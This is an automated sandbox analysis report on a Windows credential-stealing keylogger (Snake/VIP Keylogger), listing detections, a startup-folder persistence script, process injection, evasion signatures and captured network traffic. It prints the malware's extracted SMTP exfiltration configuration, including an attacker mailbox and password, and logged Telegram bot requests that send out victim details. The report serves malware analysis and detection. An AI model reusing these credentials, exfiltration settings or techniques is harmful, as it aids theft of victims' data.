Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
pbgjw8i8N7.exe

Overview

General Information

Sample name:pbgjw8i8N7.exe
renamed because original name is a hash value
Original sample name:44095f79a9e682a29ed75fab33f6dcf1e2f11937097e4c7e3f84080ff7444048.exe
Analysis ID:1634876
MD5:679da76a671452de2f13a1585028e74e
SHA1:e89c5b5d3b31025710714c14955d22820e2ed493
SHA256:44095f79a9e682a29ed75fab33f6dcf1e2f11937097e4c7e3f84080ff7444048
Tags:exeSnakeKeyloggeruser-adrian__luca
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
Drops VBS files to the startup folder
Joe Sandbox ML detected suspicious sample
Sample uses string decryption to hide its real strings
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • pbgjw8i8N7.exe (PID: 1988 cmdline: "C:\Users\user\Desktop\pbgjw8i8N7.exe" MD5: 679DA76A671452DE2F13A1585028E74E)
    • InstallUtil.exe (PID: 8068 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • wscript.exe (PID: 6828 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XsdType.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • XsdType.exe (PID: 6732 cmdline: "C:\Users\user\AppData\Roaming\XsdType.exe" MD5: 679DA76A671452DE2F13A1585028E74E)
      • InstallUtil.exe (PID: 7500 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "bank@iaa-airferight.com", "Password": "moneyismade22", "Host": "mail.iaa-airferight.com", "Port": "25"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.2570925272.0000000002C2E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
    00000000.00000002.1353040747.0000000005380000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
      00000003.00000002.1478818577.0000000003AD3000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000003.00000002.1478818577.0000000003AD3000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
          00000003.00000002.1478818577.0000000003AD3000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
            Click to see the 40 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.pbgjw8i8N7.exe.5380000.6.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
              0.2.pbgjw8i8N7.exe.5380000.6.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                1.2.InstallUtil.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  1.2.InstallUtil.exe.400000.0.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
                    1.2.InstallUtil.exe.400000.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                      Click to see the 32 entries

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: WScript or CScript Dropper
                      Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XsdType.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XsdType.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3084, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XsdType.vbs" , ProcessId: 6828, ProcessName: wscript.exe
                      Sigma detected: Suspicious Outbound SMTP Connections
                      Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 46.175.148.58, DestinationIsIpv6: false, DestinationPort: 25, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Initiated: true, ProcessId: 8068, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49751
                      Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                      Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XsdType.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XsdType.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3084, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XsdType.vbs" , ProcessId: 6828, ProcessName: wscript.exe

                      Data Obfuscation

                      barindex
                      Sigma detected: Drops script at startup location
                      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\pbgjw8i8N7.exe, ProcessId: 1988, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XsdType.vbs

                      Suricata Signatures

                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-03-11T06:10:07.153657+010028033053Unknown Traffic192.168.2.549714104.21.96.1443TCP
                      2025-03-11T06:10:18.915468+010028033053Unknown Traffic192.168.2.549719104.21.96.1443TCP
                      2025-03-11T06:10:30.004518+010028033053Unknown Traffic192.168.2.549726104.21.96.1443TCP
                      2025-03-11T06:10:34.050375+010028033053Unknown Traffic192.168.2.549729104.21.96.1443TCP
                      2025-03-11T06:10:49.188792+010028033053Unknown Traffic192.168.2.549748104.21.96.1443TCP
                      2025-03-11T06:10:52.152063+010028033053Unknown Traffic192.168.2.549750104.21.96.1443TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-03-11T06:09:59.024815+010028032742Potentially Bad Traffic192.168.2.549712158.101.44.24280TCP
                      2025-03-11T06:10:04.872621+010028032742Potentially Bad Traffic192.168.2.549712158.101.44.24280TCP
                      2025-03-11T06:10:16.717744+010028032742Potentially Bad Traffic192.168.2.549715158.101.44.24280TCP
                      2025-03-11T06:10:24.107212+010028032742Potentially Bad Traffic192.168.2.549716158.101.44.24280TCP
                      2025-03-11T06:10:27.857004+010028032742Potentially Bad Traffic192.168.2.549716158.101.44.24280TCP
                      2025-03-11T06:10:30.716397+010028032742Potentially Bad Traffic192.168.2.549728158.101.44.24280TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-03-11T06:10:45.740940+010018100071Potentially Bad Traffic192.168.2.549745149.154.167.220443TCP
                      2025-03-11T06:10:54.564569+010018100071Potentially Bad Traffic192.168.2.549753149.154.167.220443TCP

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Antivirus / Scanner detection for submitted sample
                      Source: pbgjw8i8N7.exeAvira: detected
                      Antivirus detection for dropped file
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeAvira: detection malicious, Label: TR/AD.GenSteal.frzkf
                      Found malware configuration
                      Source: 00000003.00000002.1478818577.0000000003BBB000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "bank@iaa-airferight.com", "Password": "moneyismade22", "Host": "mail.iaa-airferight.com", "Port": "25"}
                      Multi AV Scanner detection for dropped file
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeVirustotal: Detection: 70%Perma Link
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeReversingLabs: Detection: 63%
                      Multi AV Scanner detection for submitted file
                      Source: pbgjw8i8N7.exeVirustotal: Detection: 70%Perma Link
                      Source: pbgjw8i8N7.exeReversingLabs: Detection: 63%
                      Joe Sandbox ML detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Sample uses string decryption to hide its real strings
                      Source: 3.2.XsdType.exe.3bbbdb0.2.unpackString decryptor: bank@iaa-airferight.com
                      Source: 3.2.XsdType.exe.3bbbdb0.2.unpackString decryptor: moneyismade22
                      Source: 3.2.XsdType.exe.3bbbdb0.2.unpackString decryptor: mail.iaa-airferight.com
                      Source: 3.2.XsdType.exe.3bbbdb0.2.unpackString decryptor: 25
                      Source: 3.2.XsdType.exe.3bbbdb0.2.unpackString decryptor:

                      Location Tracking

                      barindex
                      Tries to detect the country of the analysis system (by using the IP)
                      Source: unknownDNS query: name: reallyfreegeoip.org
                      Source: pbgjw8i8N7.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                      Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:49713 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:49723 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49745 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49753 version: TLS 1.2
                      Source: pbgjw8i8N7.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: pbgjw8i8N7.exe, 00000000.00000002.1349861546.0000000003ACD000.00000004.00000800.00020000.00000000.sdmp, pbgjw8i8N7.exe, 00000000.00000002.1353607165.00000000054D0000.00000004.08000000.00040000.00000000.sdmp, pbgjw8i8N7.exe, 00000000.00000002.1349861546.0000000003A7C000.00000004.00000800.00020000.00000000.sdmp, XsdType.exe, 00000003.00000002.1478818577.0000000003BBB000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: pbgjw8i8N7.exe, 00000000.00000002.1349861546.0000000003ACD000.00000004.00000800.00020000.00000000.sdmp, pbgjw8i8N7.exe, 00000000.00000002.1353607165.00000000054D0000.00000004.08000000.00040000.00000000.sdmp, pbgjw8i8N7.exe, 00000000.00000002.1349861546.0000000003A7C000.00000004.00000800.00020000.00000000.sdmp, XsdType.exe, 00000003.00000002.1478818577.0000000003BBB000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdbSHA256}Lq source: pbgjw8i8N7.exe, 00000000.00000002.1353290642.0000000005430000.00000004.08000000.00040000.00000000.sdmp, pbgjw8i8N7.exe, 00000000.00000002.1349861546.00000000039B9000.00000004.00000800.00020000.00000000.sdmp, XsdType.exe, 00000003.00000002.1478818577.0000000003A11000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdb source: pbgjw8i8N7.exe, 00000000.00000002.1353290642.0000000005430000.00000004.08000000.00040000.00000000.sdmp, pbgjw8i8N7.exe, 00000000.00000002.1349861546.00000000039B9000.00000004.00000800.00020000.00000000.sdmp, XsdType.exe, 00000003.00000002.1478818577.0000000003A11000.00000004.00000800.00020000.00000000.sdmp
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h0_2_04E903C4
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h0_2_04E903D0
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeCode function: 4x nop then jmp 0525428Bh0_2_05254423
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeCode function: 4x nop then jmp 0525428Bh0_2_052540A8
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeCode function: 4x nop then jmp 0525428Bh0_2_05254098
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeCode function: 4x nop then jmp 0525428Bh0_2_0525424E
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeCode function: 4x nop then jmp 0526DEB9h0_2_0526DE49
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeCode function: 4x nop then jmp 0526DEB9h0_2_0526DE58
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then mov ecx, dword ptr [ebp-38h]1_2_00CE6B28
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then mov ecx, dword ptr [ebp-38h]1_2_00CE7CA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 028DF5BDh1_2_028DF420
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 028DF5BDh1_2_028DF68F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 028DF5BDh1_2_028DF60C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 028DFDA0h1_2_028DFAC1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 064B28EAh1_2_064B2610
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 064B3040h1_2_064B2C28
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h1_2_064B0673
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 064BF8F8h1_2_064BF628
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 064BD908h1_2_064BD638
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 064BDD98h1_2_064BDAC8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 064BFD88h1_2_064BFAB8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 064BE228h1_2_064BDF58
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 064B3040h1_2_064B2F6E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 064B0D0Dh1_2_064B0B30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 064B16F8h1_2_064B0B30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 064BE6B8h1_2_064BE3E8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h1_2_064B0040
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h1_2_064B0853
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 064BEB48h1_2_064BE878
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 064B3040h1_2_064B2C1A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 064BEFD8h1_2_064BED08
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 064BF468h1_2_064BF198
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 064BD478h1_2_064BD1A8
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h3_2_050603C4
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h3_2_050603D0
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeCode function: 4x nop then jmp 052E428Bh3_2_052E441B
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeCode function: 4x nop then jmp 052E428Bh3_2_052E40A8
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeCode function: 4x nop then jmp 052E428Bh3_2_052E4098
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeCode function: 4x nop then jmp 052E428Bh3_2_052E424E
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeCode function: 4x nop then jmp 052FDEB9h3_2_052FDE49
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeCode function: 4x nop then jmp 052FDEB9h3_2_052FDE58
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then mov ecx, dword ptr [ebp-38h]4_2_00626ADC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then mov ecx, dword ptr [ebp-38h]4_2_00627E40
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0228F45Dh4_2_0228F2C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0228F45Dh4_2_0228F4AC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0228FC40h4_2_0228F961
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05E632C8h4_2_05E62EB0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05E62CEAh4_2_05E62A10
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05E6EFF0h4_2_05E6ED20
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05E6E6D0h4_2_05E6E400
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05E6E240h4_2_05E6DF70
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h4_2_05E60673
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05E6F910h4_2_05E6F640
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05E6D920h4_2_05E6D650
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05E632C8h4_2_05E631F6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05E6D490h4_2_05E6D1C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05E6F480h4_2_05E6F1B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05E6EB60h4_2_05E6E890
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h4_2_05E60040
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h4_2_05E60853
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05E60D0Dh4_2_05E60B30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05E616F8h4_2_05E60B30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05E6DDB0h4_2_05E6DAE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05E6FDA0h4_2_05E6FAD0

                      Networking

                      barindex
                      Suricata IDS alerts for network traffic
                      Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.5:49753 -> 149.154.167.220:443
                      Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.5:49745 -> 149.154.167.220:443
                      Uses the Telegram API (likely for C&C communication)
                      Source: unknownDNS query: name: api.telegram.org
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:841618%0D%0ADate%20and%20Time:%2012/03/2025%20/%2023:06:52%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20841618%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:841618%0D%0ADate%20and%20Time:%2012/03/2025%20/%2005:49:32%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20841618%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                      Source: Joe Sandbox ViewIP Address: 46.175.148.58 46.175.148.58
                      Source: Joe Sandbox ViewIP Address: 104.21.96.1 104.21.96.1
                      Source: Joe Sandbox ViewIP Address: 104.21.96.1 104.21.96.1
                      Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: unknownDNS query: name: checkip.dyndns.org
                      Source: unknownDNS query: name: reallyfreegeoip.org
                      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49728 -> 158.101.44.242:80
                      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49715 -> 158.101.44.242:80
                      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49716 -> 158.101.44.242:80
                      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49712 -> 158.101.44.242:80
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49719 -> 104.21.96.1:443
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49748 -> 104.21.96.1:443
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49714 -> 104.21.96.1:443
